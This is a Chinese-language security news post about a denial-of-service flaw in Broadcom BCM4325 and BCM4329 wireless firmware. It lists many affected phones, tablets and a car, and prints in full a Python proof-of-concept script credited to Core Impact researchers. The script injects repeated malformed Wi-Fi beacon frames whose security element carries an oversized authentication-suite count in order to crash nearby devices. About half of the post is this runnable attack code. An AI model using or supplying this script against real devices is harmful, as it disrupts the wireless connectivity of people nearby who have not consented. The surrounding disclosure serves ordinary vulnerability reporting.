此次出現漏洞的是Broadcom的無線網卡固件,型號為BCM4325和BCM4329,攻擊者可以通過發送特定的無線網路資料包導致拒絕服務攻擊。
主要影響的設備有:
- BCM4325
- Apple iPhone 3GS
- Apple iPod 2G
- HTC Touch Pro 2
- HTC Droid Incredible
- Samsung Spica
- Acer Liquid
- Motorola Devour
- Ford Edge (yes, it’s a car)
- BCM4329
- Apple iPhone 4
- Apple iPhone 4 Verizon
- Apple iPod 3G
- Apple iPad Wi-Fi
- Apple iPad 3G
- Apple iPad 2
- Apple Tv 2G
- Motorola Xoom
- Motorola Droid X2
- Motorola Atrix
- Samsung Galaxy Tab
- Samsung Galaxy S 4G
- Samsung Nexus S
- Samsung Stratosphere
- Samsung Fascinate
- HTC Nexus One
- HTC Evo 4G
- HTC ThunderBolt
- HTC Droid Incredible 2
- LG Revolution
- Sony Ericsson Xperia Play
- Pantech Breakout
- Nokia Lumina 800
- Kyocera Echo
- Asus Transformer Prime
- Malata ZPad
可以看到蘋果三星都在其中,估計影響的範圍是比較大的。漏洞由Andres Blanco發現,Core Impact team的 Andres Blanco和 Matias Eissler寫出了漏洞的POC,POC如下:
本POC在python開源庫 library Lorcon和 PyLorcon2下實現
------------------------- poc.py ------------------------- #!/usr/bin/env python import sys import time import struct import PyLorcon2 def beaconFrameGenerator(): sequence = 0 while(1): sequence = sequence % 4096 # Frame Control frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon frame += '\x00' # Flags: 0 frame += '\x00\x00' # Duration: 0 frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence: part of the generator # Frame Body frame += struct.pack('Q', time.time()) # Timestamp frame += '\x64\x00' # Beacon Interval: 0.102400 seconds frame += '\x11\x04' # Capability Information: ESS, Privacy, Short Slot time # Information Elements # SSID: buggy frame += '\x00\x05buggy' # Supported Rates: 1,2,5.5,11,18,24,36,54 frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c' # DS Parameter Set: 6 frame += '\x03\x01\x06' # RSN IE frame += '\x30' # ID: 48 frame += '\x14' # Size: 20 frame += '\x01\x00' # Version: 1 frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP frame += '\x01\x00' # Pairwise cipher suite count: 1 frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP frame += '\xff\xff' # Authentication suites count: 65535 frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK frame += '\x00\x00' sequence += 1 yield frame if __name__ == "__main__": if len(sys.argv) != 2: print "Usage:" print "\t%s <wireless interface>" % sys.argv[0] sys.exit(-1) iface = sys.argv[1] context = PyLorcon2.Context(iface) context.open_injmon() generator = beaconFrameGenerator() for i in range(10000): frame = generator.next() time.sleep(0.100) context.send_bytes(frame)